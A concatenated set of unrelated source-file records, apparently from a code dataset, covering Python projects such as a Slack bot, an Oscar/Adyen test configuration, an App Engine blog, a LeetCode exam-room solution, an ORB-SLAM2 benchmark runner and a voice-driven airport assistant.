ID.\n\n Parameters\n -----------\n subject: Subject\n field: str\n field name to search for; expecting either 'hmbpp_status' or 'ribo_status'\n\n Returns\n --------\n str\n common value of hmbpp_status/ribo_status\n \"\"\"\n if all([b[field] is None for b in subject.infection_data]):\n return 'Unknown'\n if all([b[field] == 'P+ve' for b in subject.infection_data]):\n return 'P+ve'\n if all([b[field] == 'N-ve' for b in subject.infection_data]):\n return 'N-ve'\n return 'mixed'\n\n\ndef biology(subject_id: str, test_name: str, method: str) -> np.float or None:\n \"\"\"\n Given some test name, return a summary statistic of all results for a given patient ID\n\n Parameters\n -----------\n subject_id: str\n patient identifier\n test_name: str\n name of test to search for\n method: str\n summary statistic to use\n\n Returns\n --------\n Numpy.float or None\n Summary statistic (numpy float) or None if test does not exist\n \"\"\"\n if subject_id is None:\n return None\n tests = Subject.objects(patient_id=subject_id).get().patient_biology\n tests = [t.result for t in tests if t.test == test_name]\n if not tests:\n return None\n if method == 'max':\n return np.max(tests)\n if method == 'min':\n return np.min(tests)\n if method == 'median':\n return np.median(tests)\n return np.average(tests)\n\n","sub_path":"CytoPy/data/subject.py","file_name":"subject.py","file_ext":"py","file_size_in_byte":11838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486005084","text":"import psycopg2, os, sys, datetime \n\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"db\"))\nimport databaseBursts # pylint: disable=C0413, E0401\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"categorisation\"))\nfrom burstProcessing import packetBurstification, burstPrediction # pylint: disable=C0413, E0401\n\npacketBurstification()\nburstPrediction()\n\nDB_MANAGER = databaseBursts.dbManager()\n\ngetAll = \"\"\" SELECT * FROM bursts ORDER BY id\"\"\"\nprint ( DB_MANAGER.execute(getAll, \"\"))\n\ngetAll = \"\"\" SELECT * FROM categories ORDER BY id\"\"\"\nprint ( DB_MANAGER.execute(getAll, \"\"))\n\ngetALL = \"\"\" SELECT MIN(time), MIN(mac), burst, MIN(categories.name) FROM packets JOIN bursts ON bursts.id = packets.burst JOIN categories ON categories.id = bursts.category GROUP BY burst ORDER BY burst\"\"\"\nresult = DB_MANAGER.execute(getALL, \"\")\n\nfor row in result:\n print(row)\n\n\n","sub_path":"tests/testCategorisation.py","file_name":"testCategorisation.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"377833162","text":"\"\"\"empty message\n\nRevision ID: 1b92db4fb0ce\nRevises: 8541b8cbe108\nCreate Date: 2020-04-13 21:55:38.198618\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1b92db4fb0ce'\ndown_revision = '8541b8cbe108'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('posts',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('poster_email', sa.String(length=120), nullable=True),\n sa.Column('date_posted', sa.Date(), nullable=True),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('title', sa.String(length=140), nullable=True),\n sa.Column('apply_here_email', sa.String(length=120), nullable=True),\n sa.Column('link_to_application_site', sa.String(length=100), nullable=True),\n sa.Column('job_location', sa.String(length=120), nullable=True),\n sa.Column('org_name', sa.String(length=120), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_posts_date_posted'), 'posts', ['date_posted'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_posts_date_posted'), table_name='posts')\n op.drop_table('posts')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/1b92db4fb0ce_.py","file_name":"1b92db4fb0ce_.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"490138684","text":"import numpy as np\nimport cv2\n\nbackground = np.zeros((500, 500, 4), dtype='uint8')\n# to create a black background .zeros((pt1,pt1,channels), dtype='8-bit signed integer')\n\nfont = cv2.FONT_HERSHEY_DUPLEX\n# define the font\n\ncv2.putText(background, \"RUDRA\", (50, 200), font, 4, (255, 255, 255), 3, cv2.LINE_8)\ncv2.putText(background, \"BARAD\", (50, 330), font, 4, (255, 255, 255), 3, cv2.LINE_8)\n# .putText(image, text, coordinates, font, color, thickness, line_tyoe)\n\ncv2.imshow('text', background)\n# .image(name of window, object to show)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Shapes And Text/writing_text.py","file_name":"writing_text.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"60383549","text":"filename = 'people-file'\nENDDB = 'enddb.'\nENDREC = 'endrec.'\nRECSEP = '=>'\ndef storeDB(db, filename=filename):\n\tdbfile = open(filename,'w')\n\tif (dbfile == None):\n\t\tprint(\"Open database file failed!\")\n\tfor key in db:\n\t\tprint(key,file=dbfile)\n\t\tfor (name,value) in db[key].items():\n\t\t\tprint(name + RECSEP + repr(value),file=dbfile)\n\t\tprint(ENDREC,file=dbfile)\n\tprint(ENDDB,file=dbfile)\n\tdbfile.close()\n\nif __name__ == '__main__':\n\tfrom initdata import db\n\tstoreDB(db)\n","sub_path":"make_db_file.py","file_name":"make_db_file.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"344374279","text":"import os\r\nimport webapp2\r\nimport jinja2\r\nimport re\n\r\nfrom google.appengine.ext import db\r\n\r\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\r\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir), autoescape = True)\r\n\nclass Handler(webapp2.RequestHandler):\r\n def write(self, *a, **kw):\r\n self.response.out.write(*a, **kw)\r\n \r\n def render_str(self, template, **params):\r\n t = jinja_env.get_template(template)\r\n return t.render(params)\r\n \r\n def render(self, template, **kw):\r\n self.write(self.render_str(template, **kw))\r\n\ndef blog_key(name = 'default'):\n return db.Key.from_path('blogs', name)\n \r\nclass Blog(db.Model):\r\n subject = db.StringProperty(required = True)\r\n content = db.TextProperty(required = True)\r\n created = db.DateTimeProperty(auto_now_add = True)\r\n last_modified = db.DateTimeProperty(auto_now = True)\n \n def render(self):\n self._render_text = self.content.replace('\\n', '
')\n \r\nclass BlogFront(Handler):\n def get(self):\n posts = db.GqlQuery(\"select * from Blog order by created desc limit 10\")\n self.render(\"blog-front.html\", blogs = posts)\r\n \nclass Permalink(Handler):\n def get(self, post_id):\n post = db.GqlQuery(\"select * from Blog where id = :post_id\", post_id = post_id)\n \n if not post:\n self.error(404)\n return\n else:\n self.render(\"permalink.html\", post = post)\n \nclass NewPost(Handler):\r\n def render_front(self, subject=\"\", content=\"\", error=\"\"):\r\n self.render(\"newpost.html\", subject=subject, content=content, error=error)\r\n \r\n def get(self):\r\n self.render_front()\r\n \r\n def post(self):\r\n subject = self.request.get(\"subject\")\r\n content = self.request.get(\"content\")\r\n \r\n if subject and content:\r\n a = Blog(parent = blog_key(), subject=subject, content=content)\r\n a.put()\r\n self.redirect('/blog/%s' % str(a.key().id()))\n else:\r\n error = \"we need both subject and content!\"\r\n self.render_front(subject, content, error)\n\n'''\nFrom office hours\nPermalink:\np = Post(title, content) // Datastore will create UIDs\np.put() // puts it in datastore\n\nRedirect user to:\nblah = str(p.key().id()) // you get post id\nself.redirect('/blog/%s' %x)\n\nPost look-up\nSpecial URL mapper for permalinks using\nregular expressions:\n\n('/blog', MainPage),\n('/blog/([0-9]+)', PostHandler) // PERMALINK HANDLER\n\nClass PostHandler(...):\n def get(self, post_id):\n p = Post.get_by_id(post_id)\n if p:\n render...\n else:\n 404 error\n'''\n\r\napp = webapp2.WSGIApplication([('/blog/?', BlogFront),\n ('/blog/newpost/?', NewPost),\n ('/blog/([0-9]+)', Permalink)], debug=True)","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535123251","text":"import os\nimport subprocess\n\nTUM_PATH = os.path.join(os.path.expanduser('~'), 'TUM')\nORB_SLAM2_PATH = os.path.join(os.path.expanduser('~'), 'ORB_SLAM2')\nEVA_PATH = os.path.join(os.path.expanduser('~'), 'evaluate_ate_scale')\nNUM_TEST = 5\n\n\nTUM_EXECUTABLE = os.path.join(ORB_SLAM2_PATH, 'Examples', 'RGB-D', 'rgbd_tum')\nTUM_YAML = os.path.join(ORB_SLAM2_PATH, 'Examples', 'RGB-D', 'TUM{}.yaml')\nORB_VOC = os.path.join(ORB_SLAM2_PATH, 'Vocabulary', 'ORBvoc.txt')\nASSOCIATE_PY = os.path.join(EVA_PATH, 'associate.py')\nEVA_PY = os.path.join(EVA_PATH, 'evaluate_ate_scale.py')\n\n\nall_data = os.listdir(TUM_PATH)\n\n\nfor each_data in all_data:\n\tif 'freiburg3' in each_data:\n\t\tyaml_path = TUM_YAML.format(3)\n\telif 'freiburg2' in each_data:\n\t\tyaml_path = TUM_YAML.format(2)\n\n\tdata_path = os.path.join(TUM_PATH, each_data)\n\trgb_path = os.path.join(TUM_PATH, each_data, 'rgb.txt')\n\tdepth_path = os.path.join(TUM_PATH, each_data, 'depth.txt')\n\tgt_path = os.path.join(TUM_PATH, each_data, 'groundtruth.txt')\n\tasso_path = os.path.join(TUM_PATH, each_data, 'associations.txt')\n\n\ttrajectory_path = './CameraTrajectory.txt'\n\n\t#First associate depth and rgb\n\tsubprocess.Popen(\"python {} {} {} > {}\".format(ASSOCIATE_PY, rgb_path, depth_path, asso_path), shell=True).communicate() \n\tfor i in range(NUM_TEST):\n\t\tplot_name = each_data + '_plot{}.png'.format(i)\n\t\toutput_file_name = each_data + '_error{}.txt'.format(i)\n\n\t\tif os.path.exists(trajectory_path):\n\t\t\tos.remove(trajectory_path)\n\t\t\tprint(\"Remove previous trajectory file\")\n\t\t#Run ORBSLAM\n\t\tprint(\"Running ORB_SLAM2 {}/{}\".format(i+1, NUM_TEST))\n\t\tsubprocess.Popen(\"{} {} {} {} {}\".format(TUM_EXECUTABLE, ORB_VOC, yaml_path, data_path, asso_path), shell=True).communicate() \n\n\t\t#Finish\n\t\tsubprocess.Popen(\"python {} --plot={} {} {} > {}\".format(EVA_PY, \n\t\t\tplot_name ,\n\t\t\tgt_path, \n\t\t\ttrajectory_path, \n\t\t\toutput_file_name), \n\t\t\t\t\tshell=True).communicate() \n","sub_path":"TUM_rgbd_baseline.py","file_name":"TUM_rgbd_baseline.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"237979833","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"SQL Authentication Plugin.\n\n$Id: sql.py,v 1.0 2004/10/11 mriya3\n\"\"\"\nfrom zope.app.sqlscript import SQLScript\nimport zope.interface\nimport interfaces\n\nclass SQLAuthenticationPlugin(SQLScript):\n \"\"\" SQL Authentication Plugin for Pluggable Authentication System \"\"\"\n \n zope.interface.implements(interfaces.IAuthenticationPlugin)\n \n def authenticateCredentials(self, credentials):\n result = self(**credentials)\n if not len(result):\n return None\n return str(result[0]['id']),result[0]\n\n\n \n \n","sub_path":"Zope3/tags/before-blow-services-merge/src/zope/app/authentication/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"127663477","text":"import bisect\nclass ExamRoom(object):\n# L record the index of seats where people sits\n def __init__(self, N):\n \"\"\"\n :type N: int\n \"\"\"\n self.N = N\n self.L = []\n\n\n def seat(self):\n \"\"\"\n :rtype: int\n \"\"\"\n N,L = self.N,self.L\n if not L:\n res = 0\n else:\n d,res = L[0],0\n for a,b in zip(L,L[1:]):\n if (b-a) /2> d :\n d,res = (b-a)//2,(b+a)//2\n if N-1-L[-1] >d:\n res = N-1\n bisect.insort(L,res)\n return res\n\n\n\n\n def leave(self, p):\n \"\"\"\n :type p: int\n :rtype: None\n \"\"\"\n self.L.pop(p)\n\nimport heapq\nclass ExamRoom2:\n\n def dist(self, x, y):\n if x == -1:\n return -y\n elif y == self.N:\n return -(self.N - 1 -x)\n else:\n return -(abs(x-y)//2)\n\n def __init__(self,N):\n self.N = N\n self.pq = [(self.dist(-1,N),-1,N)]\n\n def seat(self):\n _,x,y = heapq.heappop(self.pq)\n if x == -1:\n seat = 0\n elif y == self.N:\n seat = self.N - 1\n else:\n seat = (x+y)//2\n heapq.heappush(self.pq, (self.dist(x,seat),x,seat))\n heapq.heappush(self.pq,(self.dist(seat,y),seat,y))\n return seat\n\n def leave(self,p):\n head = tail = None\n for interval in self.pq:\n if interval[1] == p:\n tail = interval\n if interval[2] == p:\n head = interval\n if head and tail:\n break\n self.pq.remove(head)\n self.pq.remove(tail)\n heapq.heapify(self.pq)\n heapq.heappush(self.pq,(self.dist(head[1],tail[2]),head[1],tail[2]))\n\n","sub_path":"quora/leetcode855.py","file_name":"leetcode855.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"262906928","text":"#!/usr/bin/python\nimport os\nimport sys\nimport massspec_toolbox_config as conf\n\n(db_name, filename_fasta) = conf.get_dbinfo()\nsys.stderr.write(\"Use %s as DB file\\n\"%filename_fasta)\n\nfor filename_pepxml in os.listdir('sequest.pepxml/'):\n if( not filename_pepxml.endswith('.pepxml') ):\n continue\n filename_pepxml = os.path.join('sequest.pepxml',filename_pepxml)\n filename_pepxml_tmp = filename_pepxml+'.tmp'\n f_tmp = open(filename_pepxml_tmp,'w')\n f_pepxml = open(filename_pepxml,'r')\n for line in f_pepxml:\n line = line.strip()\n if( line.startswith('\\n'%filename_fasta)\n elif( line.startswith('\\n'%filename_fasta)\n elif( line.startswith('\\n'%filename_fasta)\n else:\n f_tmp.write('%s\\n'%line)\n f_pepxml.close()\n f_tmp.close()\n os.rename(filename_pepxml_tmp,filename_pepxml)\n","sub_path":"pipeline/sequest.pepxml-setdb.py","file_name":"sequest.pepxml-setdb.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425104669","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404, JsonResponse\nfrom django.core.exceptions import SuspiciousOperation\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib\nimport json\n\nfrom .models import Reply\n\nWEBHOOK_URL = 'YOUR_WEBHOOK_URL'\nVERIFICATION_TOKEN = 'YOUR_VERIFICATION_TOKEN'\nACTION_HOW_ARE_YOU = 'HOW_ARE_YOU'\n\ndef index(request):\n positive_replies = Reply.objects.filter(response=Reply.POSITIVE)\n neutral_replies = Reply.objects.filter(response=Reply.NEUTRAL)\n negative_replies = Reply.objects.filter(response=Reply.NEGATIVE)\n\n context = {\n 'positive_replies': positive_replies,\n 'neutral_replies': neutral_replies,\n 'negative_replies': negative_replies,\n\n }\n return render(request, 'index.html', context)\n\ndef clear(request):\n Reply.objects.all().delete()\n return redirect(index)\n\ndef announce(request):\n if request.method == 'POST':\n data = {\n 'text': request.POST['message']\n }\n post_message(WEBHOOK_URL, data)\n\n return redirect(index)\n\n@csrf_exempt\ndef echo(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n if request.POST.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n user_name = request.POST['user_name']\n user_id = request.POST['user_id']\n content = request.POST['text']\n\n result = {\n 'text': '<@{}> {}'.format(user_id, content.upper()),\n 'response_type': 'in_channel'\n }\n\n return JsonResponse(result)\n\n@csrf_exempt\ndef hello(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n if request.POST.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n user_name = request.POST['user_name']\n user_id = request.POST['user_id']\n content = request.POST['text']\n\n result = {\n 'blocks': [\n {\n 'type' : 'section',\n 'text' : {\n 'type': 'mrkdwn',\n 'text': '<@{}> How are you?'.format(user_id)\n },\n 'accessory': {\n 'type': 'static_select',\n 'placeholder': {\n 'type': 'plain_text',\n 'text': 'I am:',\n 'emoji': True\n },\n 'options': [\n {\n 'text': {\n 'type': 'plain_text',\n 'text': 'Fine.',\n 'emoji': True\n },\n 'value': 'positive'\n },\n {\n 'text': {\n 'type': 'plain_text',\n 'text': 'So so.',\n 'emoji': True\n },\n 'value': 'neutral'\n },\n {\n 'text': {\n 'type': 'plain_text',\n 'text': 'Terrible.',\n 'emoji': True\n },\n 'value': 'negative'\n }\n ],\n 'action_id': ACTION_HOW_ARE_YOU\n }\n }\n ],\n 'response_type': 'in_channel'\n }\n\n return JsonResponse(result)\n\n@csrf_exempt\ndef reply(request):\n if request.method != 'POST':\n return JsonResponse({})\n \n payload = json.loads(request.POST.get('payload'))\n print(payload)\n if payload.get('token') != VERIFICATION_TOKEN:\n raise SuspiciousOperation('Invalid request.')\n \n if payload['actions'][0]['action_id'] != ACTION_HOW_ARE_YOU:\n raise SuspiciousOperation('Invalid request.')\n \n user = payload['user']\n selected_value = payload['actions'][0]['selected_option']['value']\n response_url = payload['response_url']\n\n if selected_value == 'positive':\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.POSITIVE)\n reply.save()\n response = {\n 'text': '<@{}> Great! :smile:'.format(user['id'])\n }\n elif selected_value == 'neutral':\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.NEUTRAL)\n reply.save()\n response = {\n 'text': '<@{}> Ok, thank you! :sweat_smile:'.format(user['id'])\n }\n else:\n reply = Reply(user_name=user['name'], user_id=user['id'], response=Reply.NEGATIVE)\n reply.save()\n response = {\n 'text': '<@{}> Good luck! :innocent:'.format(user['id'])\n }\n \n post_message(response_url, response)\n\n return JsonResponse({})\n\ndef post_message(url, data):\n headers = {\n 'Content-Type': 'application/json',\n }\n req = urllib.request.Request(url, json.dumps(data).encode(), headers)\n with urllib.request.urlopen(req) as res:\n body = res.read()","sub_path":"team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"358504166","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^admin_home/', views.admin_home, name='admin_home'),\n url(r'^centrosMedicos_lista/', views.centrosMedicos_lista, name='centrosMedicos_lista'),\n url(r'^centroMedico_alta/', views.centroMedico_alta, name='centroMedico_alta'),\n url(r'^centroMedico_baja/', views.centroMedico_baja, name='centroMedico_baja'),\n url(r'^centroMedico_modificacion/', views.centroMedico_modificacion, name='centroMedico_modificacion'),\n url(r'^centroMedico_detalle/(?P[0-9A-Za-z]+)/$', views.centroMedico_detalle, name='centroMedico_detalle'),\n]\n","sub_path":"apps/administracion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"249078825","text":"# \"\"\"\n# Django settings for tests project.\n# \"\"\"\n\nimport os\n\nfrom oscar.defaults import *\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nSECRET_KEY = '+&l^d!%soa4gxsnx7_txbo0x3uv$@4i&n!r8yte72otwqo7vmh'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\nOSCAR_DEFAULT_CURRENCY = 'EUR'\nOSCAR_REQUIRED_ADDRESS_FIELDS = []\nOSCAR_SLUG_ALLOW_UNICODE = False\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n)\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n\n 'oscar',\n 'oscar.apps.analytics',\n 'oscar.apps.checkout',\n 'oscar.apps.address',\n 'oscar.apps.shipping',\n 'oscar.apps.catalogue',\n 'oscar.apps.catalogue.reviews',\n 'oscar.apps.partner',\n 'oscar.apps.basket',\n 'oscar.apps.payment',\n 'oscar.apps.offer',\n 'oscar.apps.order',\n 'oscar.apps.customer',\n 'oscar.apps.search',\n 'oscar.apps.voucher',\n 'oscar.apps.wishlists',\n 'oscar.apps.dashboard',\n 'oscar.apps.dashboard.reports',\n 'oscar.apps.dashboard.users',\n 'oscar.apps.dashboard.orders',\n 'oscar.apps.dashboard.catalogue',\n 'oscar.apps.dashboard.offers',\n 'oscar.apps.dashboard.partners',\n 'oscar.apps.dashboard.pages',\n 'oscar.apps.dashboard.ranges',\n 'oscar.apps.dashboard.reviews',\n 'oscar.apps.dashboard.vouchers',\n 'oscar.apps.dashboard.communications',\n 'oscar.apps.dashboard.shipping',\n\n 'adyen',\n]\n\nADYEN_IDENTIFIER = 'OscaroFR'\nADYEN_SECRET_KEY = 'oscaroscaroscaro'\nADYEN_ACTION_URL = 'https://test.adyen.com/hpp/select.shtml'\nADYEN_SKIN_CODE = 'cqQJKZpg'\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n },\n}\n","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322501164","text":"import logging\nimport os\nimport sys\nimport unittest\nfrom configparser import ConfigParser\n\nfrom dotenv import load_dotenv\n\nfrom mop2.comprehension.azure.identity.azure_identity_credential_adapter import AzureIdentityCredentialAdapter\nfrom mop2.comprehension.azure.policy_insights.policy_definition_insight_scope import PolicyDefinitionInsightScope\nfrom mop2.utils.configuration import TESTINGPATH, TESTVARIABLES\nfrom mop2.utils.files import change_dir\n\n\nclass TestPolicyDefinitionInsightScope(unittest.TestCase):\n def setUp(self) -> None:\n load_dotenv()\n with change_dir(TESTINGPATH):\n self.config = ConfigParser()\n self.config.read(TESTVARIABLES)\n self.test_data_config = ConfigParser()\n test_data_file = self.config['DEFAULT']['test_data_file']\n self.test_data_config.read(test_data_file)\n\n self.subscription_id = os.environ[\"AZURE_SUBSCRIPTION_ID\"]\n self.tenant_id = os.environ[\"AZURE_TENANT_ID\"]\n self.management_group_id = os.environ[\"AZURE_MANAGEMENT_GROUP_ID\"]\n client_id = os.environ[\"CLIENT\"]\n client_secret = os.environ[\"KEY\"]\n\n logging_level = self.config['LOGGING']['level']\n logging.basicConfig(stream=sys.stdout, level=int(logging_level))\n\n def test_list_query_results_for_policy_definition(self):\n # Policy Defintion to be tested\n policy_definition_name = self.test_data_config['AZURE_POLICY'][\"policy_name_04\"]\n\n # Azure Active Directory Credentials\n credentials = AzureIdentityCredentialAdapter()\n policy_definition_insight = PolicyDefinitionInsightScope(operations_path=TESTINGPATH,\n config_variables=TESTVARIABLES)\n\n insights = policy_definition_insight.list_query_results_for_policy_definition(subscription_id=self.subscription_id,\n policy_definition_name=policy_definition_name,\n credentials = credentials)\n self.assertEqual(True, True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/mop2/azure/test_policy_definition_insight_scope.py","file_name":"test_policy_definition_insight_scope.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"80973085","text":"from functools import wraps\nfrom flask import g, request, redirect, url_for\nfrom flask_login import current_user\n\n# decorator to use to 'lock' a view to only be accessible to logged in users.\n# if the current_user is authenticated (only logged in users are authenticated), then return the view, otherwise redirect to login.\n# next is the url that the person was trying to access, which should be included in login so that the user can login and immediately be where they want.\ndef login_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n current_user.is_authenticated()\n except:\n return redirect(url_for('auth.login', next=request.url))\n return f(*args, **kwargs)\n return decorated_function","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"419473540","text":"import pyttsx3\r\nimport datetime\r\nimport time\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport os\r\nimport webbrowser\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice',voices[1].id)\r\nengine.setProperty('rate',200)\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\ndef wishme():\r\n hour = int(datetime.datetime.now().hour)\r\n\r\n if hour>=0 and hour<12:\r\n print(\"Good Morning\")\r\n speak(\"Good Morning\")\r\n\r\n elif hour>=12 and hour<=15:\r\n print(\"Good Afternoon\")\r\n speak(\"Good Afternoon\")\r\n\r\n else:\r\n print(\"Good Evening\")\r\n speak(\"Good Evening\")\r\n\r\n time.sleep(1)\r\n speak(\"Welcome to Rajiv Gandhi International Airport Hyderabad\")\r\n print(\"\\nSpeak any of the following to get the service\\nFLIGHT for flight information\\nAIRPORT for airport information\\nPNR for pnr information\")\r\n time.sleep(1)\r\n speak(\"\\nSpeak any of the following to get the service\\nFLIGHT for flight information\\nAIRPORT for airport information\\nPNR for pnr information\")\r\ndef takecommand():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Wait....Calibrating Microphone\")\r\n r.adjust_for_ambient_noise(source,duration=2)\r\n r.dynamic_energy_threshold = True\r\n print(\"It's your turn now....\")\r\n r.phrase_threshold = 0.8\r\n audio = r.listen(source)\r\n \r\n try:\r\n print(\"Recognizing.....\")\r\n query = r.recognize_google(audio, language = 'en-IN')\r\n print(\"You said:\",query)\r\n\r\n except Exception as e:\r\n print(\"Sorry.It's my fault.Will you say that again please...\")\r\n speak(\"Sorry It's my fault will you say that again please...\")\r\n query='None'\r\n \r\n return query\r\n\r\nif __name__ == \"__main__\":\r\n wishme()\r\n Airport={'Port Blair':'IXZ','Visakhapatnam':'VTZ','Tirupati':'TIR','Pasighat':'IXT','Guwahati':'GAU','Patna':'PAT','Darbhanga':'DBR','Raipur':'RPR','Delhi':'DEL','Goa':'GOI','Ahmedabad':'AMD','Surat':'STV','Hisar':'HSS','Shimla':'SLV','Srinagar':'SXR','Ranchi':'IXR','Bangalore':'BLR','Mangalore':'IXE','Thiruvananthapuram':'TRV','Kochi':'COK','Bhopal':'BHO','Indore':'IDR','Aurangabad':'IXU','Mumbai':'BOM','Nagpur':'NAG','Pune':'PNQ','Imphal':'IMF','Shillong':'SHL','Aizawl':'AJL','Dimapur':'DMU','Bhubaneswar':'BBI','Puducherry':'PNY','Amritsar':'ATQ','Jalandhar':'AIP','Jaipur':'JAI','Chennai':'MAA','Madurai':'IXM','Tiruchirapalli':'TRZ','Hyderabad':'HYD','Agartala':'IXA','Dehradun':'DED','Varanasi':'VNS','Lucknow':'LKO','Kanpur':'KNU','Agra':'AGR','Siliguri':'IXB','Kolkata':'CCU','Durgapur':'RDP'}\r\n while True:\r\n query=takecommand()\r\n\r\n if 'flight' in query:\r\n initial='None'\r\n destination='None'\r\n date1='None'\r\n opt='None'\r\n date2='None'\r\n \r\n print(\"Enter Boarding Airport\")\r\n speak(\"Enter Boarding Airport\")\r\n while initial=='None':\r\n initial=takecommand()\r\n \r\n print(\"Enter Destination Airport\")\r\n speak(\"Now,Enter Destination Airport\")\r\n while destination=='None':\r\n destination=takecommand()\r\n \r\n print(\"Now,Enter Journey date in Year Month Date format(For example for 7 December 2019 just say 2019 12 7)\")\r\n speak(\"Now,Enter Journey date Enter the date in Date Month year format.\")\r\n while date1=='None':\r\n date1=takecommand()\r\n \r\n print(\"is it a round trip Respond in yes or no\")\r\n speak(\"is it a round trip Respond in yes or no\")\r\n while opt=='None':\r\n opt=takecommand()\r\n \r\n if opt=='yes':\r\n print(\"Enter return Journey date Enter the date in Date Month year format.\")\r\n speak(\"Enter return Journey date Enter the date in Date Month year format.\")\r\n while date2=='None':\r\n date2=takecommand()\r\n webbrowser.open(\"https://www.google.com/flights?hl=en#flt=\"+Airport[initial]+\".\"+Airport[destination]+\".\"+date1+\"*\"+Airport[destination]+\".\"+Airport[initial]+\".\"+date2+\";c:INR;e:1;sd:1;t:f\")\r\n \r\n else:\r\n webbrowser.open(\"https://www.google.com/flights?hl=en#flt=\"+Airport[initial]+\".\"+Airport[destination]+\".\"+date1+\";c:INR;e:1;sd:1;t:f;tt:o\") \r\n\r\n elif 'airport' in query:\r\n speak('Rajiv Gandhi International Airport is an international airport that serves Hyderabad, the capital of the Indian state of Telangana. It is located in Shamshabad, about 24 kilometres (15 mi) south of Hyderabad. It was opened on 23 March 2008 to replace Begumpet Airport. It is named after Rajiv 